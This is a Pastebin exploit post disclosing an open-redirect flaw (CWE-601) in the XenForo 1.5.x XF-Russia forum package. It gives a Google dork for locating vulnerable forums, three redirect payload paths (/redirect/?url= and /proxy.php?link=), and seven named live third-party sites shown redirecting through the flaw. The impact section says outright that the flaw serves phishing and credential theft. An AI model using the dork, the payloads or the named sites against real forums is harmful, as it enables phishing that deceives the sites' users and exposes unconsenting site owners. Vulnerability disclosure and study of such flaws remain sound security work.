KingSkrupellos

XenForo 1.5.x XF-Russia Open Redirection

Mar 1st, 2019
50
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.45 KB | None | 0 0
  1. ####################################################################
  2.  
  3. # Exploit Title : XenForo 1.5.x XF-Russia Open Redirection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 02/03/2019
  7. # Vendor Homepage : xf-russia.ru
  8. # Software Information Link :
  9. xf-russia.ru/xenforo/changelog.html
  10. xf-russia.ru/xenforo/russian-language.html
  11. xf-russia.ru/news/xenforo-151.html
  12. # Software Version : 1.5.x and previous versions
  13. # Tested On : Windows and Linux
  14. # Category : WebApps
  15. # Exploit Risk : Medium
  16. # Google Dorks : intext:Forum software by XenForo™ ©2010-2016 XenForo Ltd. XF-Russia.ru
  17. # Vulnerability Type : CWE-601 [ URL Redirection to Untrusted Site ('Open Redirect') ]
  18. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  19. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  20. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  21.  
  22. ####################################################################
  23.  
  24. # Description about Software :
  25. ***************************
  26. XenForo is a commercial Internet forum software package written in the
  27.  
  28. PHP programming language and XF-Russia Forum is mostly used in Russia websites.
  29.  
  30. ####################################################################
  31.  
  32. # Impact :
  33. *********
  34. This web application XenForo 2010-2016 version 1.5.x XF-Russia accepts a user-controlled
  35.  
  36. input that specifies a link to an external site, and uses that link in a Redirect.
  37.  
  38. This simplifies phishing attacks. An http parameter may contain a URL value and could cause
  39.  
  40. the web application to redirect the request to the specified URL. By modifying the URL value
  41.  
  42. to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials.
  43.  
  44. Because the server name in the modified link is identical to the original site, phishing attempts
  45.  
  46. have a more trustworthy appearance.
  47.  
  48. Open redirect is a failure in that process that makes it possible for attackers to steer users to malicious websites.
  49.  
  50. This vulnerability is used in phishing attacks to get users to visit malicious sites without realizing it.
  51.  
  52. Web users often encounter redirection when they visit the Web site of a company whose name
  53.  
  54. has been changed or which has been acquired by another company. Visiting unreal web page
  55.  
  56. user's computer becomes affected by malware the task of which is to deceive the valid actor and steal his personal data.
  57.  
  58. ####################################################################
  59.  
  60. # Open Redirection Exploit :
  61. *************************
  62. /redirect/?url=https://www.[REDIRECTION-ADDRESS].gov
  63.  
  64. /forum/redirect/?url=https://www.[REDIRECTION-ADDRESS].gov
  65.  
  66. /proxy.php?link=https://www.[REDIRECTION-ADDRESS].gov
  67.  
  68. ####################################################################
  69.  
  70. # Example Vulnerable Sites :
  71. *************************
  72. [+] yootheme.su/forum/redirect/?url=https://cxsecurity.com/
  73.  
  74. [+] forum.r-rp.ru/redirect/?url=https://cxsecurity.com/
  75.  
  76. [+] renault-kaptur.su/redirect/?url=https://cxsecurity.com/
  77.  
  78. [+] null-prog.ru/redirect/?url=https://cxsecurity.com/
  79.  
  80. [+] 69dom.ru/redirect?url=https://cxsecurity.com/
  81.  
  82. [+] shape5.su/forum/redirect/?url=https://cxsecurity.com/
  83.  
  84. [+] alevicanlar.net/proxy.php?link=https://cxsecurity.com/
  85.  
  86. ####################################################################
  87.  
  88. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  89.  
  90. ####################################################################
Add Comment
Please, Sign In to add comment